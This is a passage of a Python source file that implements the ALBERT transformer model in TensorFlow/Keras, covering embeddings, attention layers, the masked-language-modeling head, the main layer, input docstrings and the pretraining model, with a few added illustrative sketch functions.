self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def build(self, input_shape: tf.TensorShape):
with tf.name_scope("word_embeddings"):
self.weight = self.add_weight(
name="weight",
shape=[self.vocab_size, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
with tf.name_scope("token_type_embeddings"):
self.token_type_embeddings = self.add_weight(
name="embeddings",
shape=[self.type_vocab_size, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
with tf.name_scope("position_embeddings"):
self.position_embeddings = self.add_weight(
name="embeddings",
shape=[self.max_position_embeddings, self.embedding_size],
initializer=get_initializer(self.initializer_range),
)
super().build(input_shape)
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertEmbeddings.call
def call(
self,
input_ids: tf.Tensor = None,
position_ids: tf.Tensor = None,
token_type_ids: tf.Tensor = None,
inputs_embeds: tf.Tensor = None,
training: bool = False,
) -> tf.Tensor:
"""
Applies embedding based on inputs tensor.
Returns:
final_embeddings (:obj:`tf.Tensor`): output embedding tensor.
"""
assert not (input_ids is None and inputs_embeds is None)
if input_ids is not None:
inputs_embeds = tf.gather(params=self.weight, indices=input_ids)
input_shape = shape_list(inputs_embeds)[:-1]
if token_type_ids is None:
token_type_ids = tf.fill(dims=input_shape, value=0)
if position_ids is None:
position_ids = tf.expand_dims(tf.range(start=0, limit=input_shape[-1]), axis=0)
position_embeds = tf.gather(params=self.position_embeddings, indices=position_ids)
position_embeds = tf.tile(input=position_embeds, multiples=(input_shape[0], 1, 1))
token_type_embeds = tf.gather(params=self.token_type_embeddings, indices=token_type_ids)
final_embeddings = self.embeddings_sum(inputs=[inputs_embeds, position_embeds, token_type_embeds])
final_embeddings = self.LayerNorm(inputs=final_embeddings)
final_embeddings = self.dropout(inputs=final_embeddings, training=training)
return final_embeddings
class TFAlbertAttention(tf.keras.layers.Layer):
""" Contains the complete attention sublayer, including both dropouts and layer norm. """
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
if config.hidden_size % config.num_attention_heads != 0:
raise ValueError(
f"The hidden size ({config.hidden_size}) is not a multiple of the number "
f"of attention heads ({config.num_attention_heads})"
)
self.num_attention_heads = config.num_attention_heads
self.attention_head_size = int(config.hidden_size / config.num_attention_heads)
self.all_head_size = self.num_attention_heads * self.attention_head_size
self.sqrt_att_head_size = math.sqrt(self.attention_head_size)
self.output_attentions = config.output_attentions
self.query = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="query"
)
self.key = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="key"
)
self.value = tf.keras.layers.Dense(
units=self.all_head_size, kernel_initializer=get_initializer(config.initializer_range), name="value"
)
self.dense = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
# Two different dropout probabilities; see https://github.com/google-research/albert/blob/master/modeling.py#L971-L993
self.attention_dropout = tf.keras.layers.Dropout(rate=config.attention_probs_dropout_prob)
self.output_dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def transpose_for_scores(self, tensor: tf.Tensor, batch_size: int) -> tf.Tensor:
# Reshape from [batch_size, seq_length, all_head_size] to [batch_size, seq_length, num_attention_heads, attention_head_size]
tensor = tf.reshape(tensor=tensor, shape=(batch_size, -1, self.num_attention_heads, self.attention_head_size))
# Transpose the tensor from [batch_size, seq_length, num_attention_heads, attention_head_size] to [batch_size, num_attention_heads, seq_length, attention_head_size]
return tf.transpose(tensor, perm=[0, 2, 1, 3])
def call(
self,
input_tensor: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
batch_size = shape_list(input_tensor)[0]
mixed_query_layer = self.query(inputs=input_tensor)
mixed_key_layer = self.key(inputs=input_tensor)
mixed_value_layer = self.value(inputs=input_tensor)
query_layer = self.transpose_for_scores(mixed_query_layer, batch_size)
key_layer = self.transpose_for_scores(mixed_key_layer, batch_size)
value_layer = self.transpose_for_scores(mixed_value_layer, batch_size)
# Take the dot product between "query" and "key" to get the raw attention scores.
# (batch size, num_heads, seq_len_q, seq_len_k)
attention_scores = tf.matmul(query_layer, key_layer, transpose_b=True)
dk = tf.cast(self.sqrt_att_head_size, dtype=attention_scores.dtype)
attention_scores = tf.divide(attention_scores, dk)
if attention_mask is not None:
# Apply the attention mask is (precomputed for all layers in TFAlbertModel call() function)
attention_scores = tf.add(attention_scores, attention_mask)
# Normalize the attention scores to probabilities.
attention_probs = tf.nn.softmax(logits=attention_scores, axis=-1)
# This is actually dropping out entire tokens to attend to, which might
# seem a bit unusual, but is taken from the original Transformer paper.
attention_probs = self.attention_dropout(inputs=attention_probs, training=training)
# Mask heads if we want to
if head_mask is not None:
attention_probs = tf.multiply(attention_probs, head_mask)
context_layer = tf.matmul(attention_probs, value_layer)
context_layer = tf.transpose(context_layer, perm=[0, 2, 1, 3])
# (batch_size, seq_len_q, all_head_size)
context_layer = tf.reshape(tensor=context_layer, shape=(batch_size, -1, self.all_head_size))
self_outputs = (context_layer, attention_probs) if output_attentions else (context_layer,)
hidden_states = self_outputs[0]
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.output_dropout(inputs=hidden_states, training=training)
attention_output = self.LayerNorm(inputs=hidden_states + input_tensor)
# add attentions if we output them
outputs = (attention_output,) + self_outputs[1:]
return outputs
class TFAlbertLayer(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.attention = TFAlbertAttention(config, name="attention")
self.ffn = tf.keras.layers.Dense(
units=config.intermediate_size, kernel_initializer=get_initializer(config.initializer_range), name="ffn"
)
if isinstance(config.hidden_act, str):
self.activation = get_tf_activation(config.hidden_act)
else:
self.activation = config.hidden_act
self.ffn_output = tf.keras.layers.Dense(
units=config.hidden_size, kernel_initializer=get_initializer(config.initializer_range), name="ffn_output"
)
self.full_layer_layer_norm = tf.keras.layers.LayerNormalization(
epsilon=config.layer_norm_eps, name="full_layer_layer_norm"
)
self.dropout = tf.keras.layers.Dropout(rate=config.hidden_dropout_prob)
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
training: bool = False,
) -> Tuple[tf.Tensor]:
attention_outputs = self.attention(
input_tensor=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask,
output_attentions=output_attentions,
training=training,
)
ffn_output = self.ffn(inputs=attention_outputs[0])
ffn_output = self.activation(ffn_output)
ffn_output = self.ffn_output(inputs=ffn_output)
ffn_output = self.dropout(inputs=ffn_output, training=training)
hidden_states = self.full_layer_layer_norm(inputs=ffn_output + attention_outputs[0])
# add attentions if we output them
outputs = (hidden_states,) + attention_outputs[1:]
return outputs
class TFAlbertLayerGroup(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.albert_layers = [
TFAlbertLayer(config, name="albert_layers_._{}".format(i)) for i in range(config.inner_group_num)
]
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
output_hidden_states: bool,
training: bool = False,
) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
layer_hidden_states = () if output_hidden_states else None
layer_attentions = () if output_attentions else None
for layer_index, albert_layer in enumerate(self.albert_layers):
if output_hidden_states:
layer_hidden_states = layer_hidden_states + (hidden_states,)
layer_output = albert_layer(
hidden_states=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask[layer_index],
output_attentions=output_attentions,
training=training,
)
hidden_states = layer_output[0]
if output_attentions:
layer_attentions = layer_attentions + (layer_output[1],)
# Add last layer
if output_hidden_states:
layer_hidden_states = layer_hidden_states + (hidden_states,)
return tuple(v for v in [hidden_states, layer_hidden_states, layer_attentions] if v is not None)
class TFAlbertTransformer(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, **kwargs):
super().__init__(**kwargs)
self.num_hidden_layers = config.num_hidden_layers
self.num_hidden_groups = config.num_hidden_groups
# Number of layers in a hidden group
self.layers_per_group = int(config.num_hidden_layers / config.num_hidden_groups)
self.embedding_hidden_mapping_in = tf.keras.layers.Dense(
units=config.hidden_size,
kernel_initializer=get_initializer(config.initializer_range),
name="embedding_hidden_mapping_in",
)
self.albert_layer_groups = [
TFAlbertLayerGroup(config, name="albert_layer_groups_._{}".format(i))
for i in range(config.num_hidden_groups)
]
def call(
self,
hidden_states: tf.Tensor,
attention_mask: tf.Tensor,
head_mask: tf.Tensor,
output_attentions: bool,
output_hidden_states: bool,
return_dict: bool,
training: bool = False,
) -> Union[TFBaseModelOutput, Tuple[tf.Tensor]]:
hidden_states = self.embedding_hidden_mapping_in(inputs=hidden_states)
all_attentions = () if output_attentions else None
all_hidden_states = (hidden_states,) if output_hidden_states else None
for i in range(self.num_hidden_layers):
# Index of the hidden group
group_idx = int(i / (self.num_hidden_layers / self.num_hidden_groups))
layer_group_output = self.albert_layer_groups[group_idx](
hidden_states=hidden_states,
attention_mask=attention_mask,
head_mask=head_mask[group_idx * self.layers_per_group : (group_idx + 1) * self.layers_per_group],
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
training=training,
)
hidden_states = layer_group_output[0]
if output_attentions:
all_attentions = all_attentions + layer_group_output[-1]
if output_hidden_states:
all_hidden_states = all_hidden_states + (hidden_states,)
if not return_dict:
return tuple(v for v in [hidden_states, all_hidden_states, all_attentions] if v is not None)
return TFBaseModelOutput(
last_hidden_state=hidden_states, hidden_states=all_hidden_states, attentions=all_attentions
)
class TFAlbertPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = AlbertConfig
base_model_prefix = "albert"
class TFAlbertMLMHead(tf.keras.layers.Layer):
def __init__(self, config: AlbertConfig, input_embeddings: tf.keras.layers.Layer, **kwargs):
super().__init__(**kwargs)
self.vocab_size = config.vocab_size
self.embedding_size = config.embedding_size
self.dense = tf.keras.layers.Dense(
config.embedding_size, kernel_initializer=get_initializer(config.initializer_range), name="dense"
)
if isinstance(config.hidden_act, str):
self.activation = get_tf_activation(config.hidden_act)
else:
self.activation = config.hidden_act
self.LayerNorm = tf.keras.layers.LayerNormalization(epsilon=config.layer_norm_eps, name="LayerNorm")
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
self.decoder = input_embeddings
def build(self, input_shape: tf.TensorShape):
self.bias = self.add_weight(shape=(self.vocab_size,), initializer="zeros", trainable=True, name="bias")
self.decoder_bias = self.add_weight(
shape=(self.vocab_size,), initializer="zeros", trainable=True, name="decoder/bias"
)
super().build(input_shape)
def get_output_embeddings(self) -> tf.keras.layers.Layer:
return self.decoder
def set_output_embeddings(self, value: tf.Variable):
self.decoder.weight = value
self.decoder.vocab_size = shape_list(value)[0]
def get_bias(self) -> Dict[str, tf.Variable]:
return {"bias": self.bias, "decoder_bias": self.decoder_bias}
def set_bias(self, value: tf.Variable):
self.bias = value["bias"]
self.decoder_bias = value["decoder_bias"]
self.vocab_size = shape_list(value["bias"])[0]
def call(self, hidden_states: tf.Tensor) -> tf.Tensor:
hidden_states = self.dense(inputs=hidden_states)
hidden_states = self.activation(hidden_states)
hidden_states = self.LayerNorm(inputs=hidden_states)
seq_length = shape_list(tensor=hidden_states)[1]
hidden_states = tf.reshape(tensor=hidden_states, shape=[-1, self.embedding_size])
hidden_states = tf.matmul(a=hidden_states, b=self.decoder.weight, transpose_b=True)
hidden_states = tf.reshape(tensor=hidden_states, shape=[-1, seq_length, self.vocab_size])
hidden_states = tf.nn.bias_add(value=hidden_states, bias=self.decoder_bias)
return hidden_states
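# --- Illustrative sketch (not part of the original file) ----------------------
# TFAlbertMLMHead.call above projects hidden states back onto the vocabulary by
# multiplying with the transposed input-embedding matrix (weight tying) and then
# adding a separate output bias. A minimal NumPy sketch of the same shape flow,
# with made-up sizes:
def _demo_tied_vocab_projection(batch=2, seq_length=4, embedding_size=8, vocab_size=16):
    import numpy as _np  # local import so the sketch stays self-contained
    hidden = _np.random.randn(batch, seq_length, embedding_size)
    embedding_matrix = _np.random.randn(vocab_size, embedding_size)  # shared with the input embeddings
    bias = _np.zeros(vocab_size)
    flat = hidden.reshape(-1, embedding_size)          # (batch * seq_length, embedding_size)
    logits = flat @ embedding_matrix.T + bias          # (batch * seq_length, vocab_size)
    return logits.reshape(batch, seq_length, vocab_size)
# _demo_tied_vocab_projection().shape -> (2, 4, 16)
# -------------------------------------------------------------------------------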
@keras_serializable
class TFAlbertMainLayer(tf.keras.layers.Layer):
config_class = AlbertConfig
def __init__(self, config: AlbertConfig, add_pooling_layer: bool = True, **kwargs):
super().__init__(**kwargs)
self.config = config
self.embeddings = TFAlbertEmbeddings(config, name="embeddings")
self.encoder = TFAlbertTransformer(config, name="encoder")
self.pooler = (
tf.keras.layers.Dense(
units=config.hidden_size,
kernel_initializer=get_initializer(config.initializer_range),
activation="tanh",
name="pooler",
)
if add_pooling_layer
else None
)
def get_input_embeddings(self) -> tf.keras.layers.Layer:
return self.embeddings
def set_input_embeddings(self, value: tf.Variable):
self.embeddings.weight = value
self.embeddings.vocab_size = shape_list(value)[0]
def _prune_heads(self, heads_to_prune):
"""
Prunes heads of the model. heads_to_prune: dict of {layer_num: list of heads to prune in this layer} See base
class PreTrainedModel
"""
raise NotImplementedError
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
**kwargs,
) -> Union[TFBaseModelOutputWithPooling, Tuple[tf.Tensor]]:
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
kwargs_call=kwargs,
)
if inputs["input_ids"] is not None and inputs["inputs_embeds"] is not None:
raise ValueError("You cannot specify both input_ids and inputs_embeds at the same time")
elif inputs["input_ids"] is not None:
input_shape = shape_list(inputs["input_ids"])
elif inputs["inputs_embeds"] is not None:
input_shape = shape_list(inputs["inputs_embeds"])[:-1]
else:
raise ValueError("You have to specify either input_ids or inputs_embeds")
if inputs["attention_mask"] is None:
inputs["attention_mask"] = tf.fill(dims=input_shape, value=1)
if inputs["token_type_ids"] is None:
inputs["token_type_ids"] = tf.fill(dims=input_shape, value=0)
embedding_output = self.embeddings(
input_ids=inputs["input_ids"],
position_ids=inputs["position_ids"],
token_type_ids=inputs["token_type_ids"],
inputs_embeds=inputs["inputs_embeds"],
training=inputs["training"],
)
# We create a 3D attention mask from a 2D tensor mask.
# Sizes are [batch_size, 1, 1, to_seq_length]
# So we can broadcast to [batch_size, num_heads, from_seq_length, to_seq_length]
# this attention mask is more simple than the triangular masking of causal attention
# used in OpenAI GPT, we just need to prepare the broadcast dimension here.
extended_attention_mask = tf.reshape(inputs["attention_mask"], (input_shape[0], 1, 1, input_shape[1]))
# Since attention_mask is 1.0 for positions we want to attend and 0.0 for
# masked positions, this operation will create a tensor which is 0.0 for
# positions we want to attend and -10000.0 for masked positions.
# Since we are adding it to the raw scores before the softmax, this is
# effectively the same as removing these entirely.
extended_attention_mask = tf.cast(extended_attention_mask, dtype=embedding_output.dtype)
one_cst = tf.constant(1.0, dtype=embedding_output.dtype)
ten_thousand_cst = tf.constant(-10000.0, dtype=embedding_output.dtype)
extended_attention_mask = tf.multiply(tf.subtract(one_cst, extended_attention_mask), ten_thousand_cst)
# Prepare head mask if needed
# 1.0 in head_mask indicate we keep the head
# attention_probs has shape bsz x n_heads x N x N
# input head_mask has shape [num_heads] or [num_hidden_layers x num_heads]
# and head_mask is converted to shape [num_hidden_layers x batch x num_heads x seq_length x seq_length]
if inputs["head_mask"] is not None:
raise NotImplementedError
else:
inputs["head_mask"] = [None] * self.config.num_hidden_layers
encoder_outputs = self.encoder(
hidden_states=embedding_output,
attention_mask=extended_attention_mask,
head_mask=inputs["head_mask"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output = encoder_outputs[0]
pooled_output = self.pooler(inputs=sequence_output[:, 0]) if self.pooler is not None else None
if not inputs["return_dict"]:
return (
sequence_output,
pooled_output,
) + encoder_outputs[1:]
return TFBaseModelOutputWithPooling(
last_hidden_state=sequence_output,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
attentions=encoder_outputs.attentions,
)
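# --- Illustrative sketch (not part of the original file) ----------------------
# TFAlbertMainLayer.call above turns the 2D padding mask (1 = attend, 0 = masked)
# into an additive mask of shape (batch_size, 1, 1, seq_length): 0.0 where the
# model should attend and -10000.0 where it should not, so the softmax all but
# ignores padded positions. A minimal, framework-free sketch:
def _demo_extended_attention_mask(attention_mask):
    """attention_mask: nested list of 0/1 values with shape (batch_size, seq_length)."""
    return [[[[0.0 if keep else -10000.0 for keep in row]]] for row in attention_mask]
# _demo_extended_attention_mask([[1, 1, 0]]) -> [[[[0.0, 0.0, -10000.0]]]]
# -------------------------------------------------------------------------------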
@dataclass
class TFAlbertForPreTrainingOutput(ModelOutput):
"""
Output type of :class:`~adj_tf.TFAlbertForPreTraining`.
Args:
prediction_logits (:obj:`tf.Tensor` of shape :obj:`(batch_size, sequence_length, config.vocab_size)`):
Prediction scores of the language modeling head (scores for each vocabulary token before SoftMax).
sop_logits (:obj:`tf.Tensor` of shape :obj:`(batch_size, 2)`):
            Prediction scores of the sentence order prediction (classification) head (scores of True/False continuation
before SoftMax).
hidden_states (:obj:`tuple(tf.Tensor)`, `optional`, returned when ``output_hidden_states=True`` is passed or when ``config.output_hidden_states=True``):
Tuple of :obj:`tf.Tensor` (one for the output of the embeddings + one for the output of each layer) of
shape :obj:`(batch_size, sequence_length, hidden_size)`.
Hidden-states of the model at the output of each layer plus the initial embedding outputs.
attentions (:obj:`tuple(tf.Tensor)`, `optional`, returned when ``output_attentions=True`` is passed or when ``config.output_attentions=True``):
Tuple of :obj:`tf.Tensor` (one for each layer) of shape :obj:`(batch_size, num_heads, sequence_length,
sequence_length)`.
Attentions weights after the attention softmax, used to compute the weighted average in the self-attention
heads.
"""
loss: tf.Tensor = None
prediction_logits: tf.Tensor = None
sop_logits: tf.Tensor = None
hidden_states: Optional[Tuple[tf.Tensor]] = None
attentions: Optional[Tuple[tf.Tensor]] = None
ALBERT_START_DOCSTRING = r"""
This model inherits from :class:`~adj_tf.TFPreTrainedModel`. Check the superclass documentation for the
    generic methods the library implements for all its models (such as downloading or saving, resizing the input
embeddings, pruning heads etc.)
This model is also a `tf.keras.Model <https://www.tensorflow.org/api_docs/python/tf/keras/Model>`__ subclass. Use
it as a regular TF 2.0 Keras Model and refer to the TF 2.0 documentation for all matter related to general usage
and behavior.
.. note::
        TF 2.0 models accept two formats as inputs:
- having all inputs as keyword arguments (like PyTorch models), or
        - having all inputs as a list, tuple or dict in the first positional argument.
        This second option is useful when using the :meth:`tf.keras.Model.fit` method, which currently requires having all
the tensors in the first argument of the model call function: :obj:`model(inputs)`.
If you choose this second option, there are three possibilities you can use to gather all the input Tensors in
        the first positional argument:
- a single Tensor with :obj:`input_ids` only and nothing else: :obj:`model(inputs_ids)`
- a list of varying length with one or several input Tensors IN THE ORDER given in the docstring:
:obj:`model([input_ids, attention_mask])` or :obj:`model([input_ids, attention_mask, token_type_ids])`
- a dictionary with one or several input Tensors associated to the input names given in the docstring:
:obj:`model({"input_ids": input_ids, "token_type_ids": token_type_ids})`
Args:
config (:class:`~adj_tf.AlbertConfig`): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the :meth:`~adj_tf.PreTrainedModel.from_pretrained` method to load the model
weights.
"""
ALBERT_INPUTS_DOCSTRING = r"""
Args:
input_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`):
Indices of input sequence tokens in the vocabulary.
Indices can be obtained using :class:`~adj_tf.AlbertTokenizer`. See
:func:`adj_tf.PreTrainedTokenizer.__call__` and :func:`adj_tf.PreTrainedTokenizer.encode` for
details.
`What are input IDs? <../glossary.html#input-ids>`__
attention_mask (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Mask to avoid performing attention on padding token indices. Mask values selected in ``[0, 1]``:
- 1 for tokens that are **not masked**,
- 0 for tokens that are **masked**.
`What are attention masks? <../glossary.html#attention-mask>`__
token_type_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Segment token indices to indicate first and second portions of the inputs. Indices are selected in ``[0,
1]``:
- 0 corresponds to a `sentence A` token,
- 1 corresponds to a `sentence B` token.
`What are token type IDs? <../glossary.html#token-type-ids>`_
position_ids (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`({0})`, `optional`):
Indices of positions of each input sequence tokens in the position embeddings. Selected in the range ``[0,
config.max_position_embeddings - 1]``.
`What are position IDs? <../glossary.html#position-ids>`_
head_mask (:obj:`Numpy array` or :obj:`tf.Tensor` of shape :obj:`(num_heads,)` or :obj:`(num_layers, num_heads)`, `optional`):
Mask to nullify selected heads of the self-attention modules. Mask values selected in ``[0, 1]``:
- 1 indicates the head is **not masked**,
- 0 indicates the head is **masked**.
inputs_embeds (:obj:`tf.Tensor` of shape :obj:`({0}, hidden_size)`, `optional`):
Optionally, instead of passing :obj:`input_ids` you can choose to directly pass an embedded representation.
This is useful if you want more control over how to convert :obj:`input_ids` indices into associated
vectors than the model's internal embedding lookup matrix.
output_attentions (:obj:`bool`, `optional`):
Whether or not to return the attentions tensors of all attention layers. See ``attentions`` under returned
tensors for more detail. This argument can be used only in eager mode, in graph mode the value in the
config will be used instead.
output_hidden_states (:obj:`bool`, `optional`):
Whether or not to return the hidden states of all layers. See ``hidden_states`` under returned tensors for
more detail. This argument can be used only in eager mode, in graph mode the value in the config will be
used instead.
return_dict (:obj:`bool`, `optional`):
Whether or not to return a :class:`~adj_tf.file_utils.ModelOutput` instead of a plain tuple. This
argument can be used in eager mode, in graph mode the value will always be set to True.
training (:obj:`bool`, `optional`, defaults to :obj:`False`):
Whether or not to use the model in training mode (some modules like dropout modules have different
behaviors between training and evaluation).
"""
@add_start_docstrings(
"The bare Albert Model transformer outputting raw hidden-states without any specific head on top.",
ALBERT_START_DOCSTRING,
)
class TFAlbertModel(TFAlbertPreTrainedModel):
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.albert = TFAlbertMainLayer(config, name="albert")
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@add_code_sample_docstrings(
tokenizer_class=_TOKENIZER_FOR_DOC,
checkpoint="albert-base-v2",
output_type=TFBaseModelOutputWithPooling,
config_class=_CONFIG_FOR_DOC,
)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFBaseModelOutputWithPooling, Tuple[tf.Tensor]]:
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
return outputs
# Copied from adj_tf.models.bert.modeling_tf_bert.TFBertModel.serving_output
def serving_output(self, output: TFBaseModelOutputWithPooling) -> TFBaseModelOutputWithPooling:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFBaseModelOutputWithPooling(
last_hidden_state=output.last_hidden_state,
pooler_output=output.pooler_output,
hidden_states=hs,
attentions=attns,
)
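# --- Illustrative sketch (not part of the original file) ----------------------
# ALBERT_START_DOCSTRING above says the TF models accept either keyword-argument
# inputs or a single dict/list in the first positional argument. A hypothetical
# usage sketch of both call styles, reusing the `adj_tf` package name and the
# "albert-base-v2" checkpoint already referenced in this file:
def _demo_albert_input_formats():
    from adj_tf import AlbertTokenizer
    tokenizer = AlbertTokenizer.from_pretrained("albert-base-v2")
    model = TFAlbertModel.from_pretrained("albert-base-v2")
    encoded = tokenizer("Hello, my dog is cute", return_tensors="tf")
    # Style 1: keyword arguments.
    out_kwargs = model(input_ids=encoded["input_ids"], attention_mask=encoded["attention_mask"])
    # Style 2: a single dict as the first positional argument.
    out_dict = model({"input_ids": encoded["input_ids"], "attention_mask": encoded["attention_mask"]})
    return out_kwargs.last_hidden_state, out_dict.last_hidden_state
# -------------------------------------------------------------------------------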
@add_start_docstrings(
"""
Albert Model with two heads on top for pretraining: a `masked language modeling` head and a `sentence order
prediction` (classification) head.
""",
ALBERT_START_DOCSTRING,
)
class TFAlbertForPreTraining(TFAlbertPreTrainedModel, TFAlbertPreTrainingLoss):
    # names with a '.' represent the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"predictions.decoder.weight"]
def __init__(self, config: AlbertConfig, *inputs, **kwargs):
super().__init__(config, *inputs, **kwargs)
self.num_labels = config.num_labels
self.albert = TFAlbertMainLayer(config, name="albert")
self.predictions = TFAlbertMLMHead(config, input_embeddings=self.albert.embeddings, name="predictions")
self.sop_classifier = TFAlbertSOPHead(config, name="sop_classifier")
def get_lm_head(self) -> tf.keras.layers.Layer:
return self.predictions
@add_start_docstrings_to_model_forward(ALBERT_INPUTS_DOCSTRING.format("batch_size, sequence_length"))
@replace_return_docstrings(output_type=TFAlbertForPreTrainingOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[TFModelInputType] = None,
attention_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
token_type_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
position_ids: Optional[Union[np.ndarray, tf.Tensor]] = None,
head_mask: Optional[Union[np.ndarray, tf.Tensor]] = None,
inputs_embeds: Optional[Union[np.ndarray, tf.Tensor]] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
labels: Optional[Union[np.ndarray, tf.Tensor]] = None,
sentence_order_label: Optional[Union[np.ndarray, tf.Tensor]] = None,
training: Optional[bool] = False,
**kwargs,
) -> Union[TFAlbertForPreTrainingOutput, Tuple[tf.Tensor]]:
r"""
Return:
Example::
>>> import tensorflow as tf
>>> from adj_tf import AlbertTokenizer, TFAlbertForPreTraining
>>> tokenizer = AlbertTokenizer.from_pretrained('albert-base-v2')
>>> model = TFAlbertForPreTraining.from_pretrained('albert-base-v2')
>>> input_ids = tf.constant(tokenizer.encode("Hello, my dog is cute", add_special_tokens=True))[None, :] # Batch size 1
>>> outputs = model(input_ids)
>>> prediction_logits = outputs.prediction_logits
>>> sop_logits = outputs.sop_logits
"""
inputs = input_processing(
func=self.call,
config=self.config,
input_ids=input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
labels=labels,
sentence_order_label=sentence_order_label,
training=training,
kwargs_call=kwargs,
)
outputs = self.albert(
input_ids=inputs["input_ids"],
attention_mask=inputs["attention_mask"],
token_type_ids=inputs["token_type_ids"],
position_ids=inputs["position_ids"],
head_mask=inputs["head_mask"],
inputs_embeds=inputs["inputs_embeds"],
output_attentions=inputs["output_attentions"],
output_hidden_states=inputs["output_hidden_states"],
return_dict=inputs["return_dict"],
training=inputs["training"],
)
sequence_output, pooled_output = outputs[:2]
prediction_scores = self.predictions(hidden_states=sequence_output)
sop_scores = self.sop_classifier(pooled_output=pooled_output, training=inputs["training"])
total_loss = None
if inputs["labels"] is not None and inputs["sentence_order_label"] is not None:
d_labels = {"labels": inputs["labels"]}
d_labels["sentence_order_label"] = inputs["sentence_order_label"]
total_loss = self.compute_loss(labels=d_labels, logits=(prediction_scores, sop_scores))
if not inputs["return_dict"]:
output = (prediction_scores, sop_scores) + outputs[2:]
return ((total_loss,) + output) if total_loss is not None else output
return TFAlbertForPreTrainingOutput(
loss=total_loss,
prediction_logits=prediction_scores,
sop_logits=sop_scores,
